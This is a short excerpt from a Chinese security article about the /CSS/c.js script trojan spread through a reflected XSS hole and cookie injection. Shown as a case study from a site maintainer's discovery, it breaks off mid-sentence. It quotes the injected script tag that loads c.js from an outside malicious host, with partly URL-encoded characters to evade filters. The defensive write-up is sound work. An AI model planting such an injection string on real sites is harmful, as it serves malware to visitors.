首页 相关文章 IE漏洞攻击剧增,最新/CSS/c.js木马防范手记

IE漏洞攻击剧增,最新/CSS/c.js木马防范手记

  近日,一款利用IE7漏洞进行传播的脚本木马在网上迅速传播,该木马利用搜索引擎检索站点漏洞,并进行自动传播。几天内,数万站点遭受感染,其中hongxiu.com、msn中国、东方财经网等都被入侵。

  发现恶意软件!

  某日早上,某网站维护人员小任像往常一样打开了网站首页,随手点击了一个链接,想验证一下网站是否可以正常访问,没想到居然触发了防病毒的软件的报警:“发现恶意软件”。心细的小任在一查之下大吃了一惊:首页的几乎所有链接都被加上了一个奇怪的网址“http://c.nuclear3.com/css/c.js”,而这个js脚本,就是触发防病毒软件报警的元凶。

  无奈之下,小任想到了自己单位的网络安全设备提供商启明星辰公司,并立刻联系上该公司驻当地人员,同时一并提供的还有网站的日志文件。

  攻击者的手法

  很快,小任就得到了启明星辰工程师的反馈信息,在网站的/down.asp页面下,存在一个反射式的XSS漏洞,骇客就是利用这个漏洞,通过cookie 注入的方式,将恶意脚本“Script Src=http://c.nu%63%6Cear3.com/css/c.js/script ”注入到每一个网站链接中,以达到...[ 查看全文 ]

2016-02-19 标签:

IE漏洞攻击剧增,最新/CSS/c.js木马防范手记的相关文章

手机页面
收藏网站 回到头部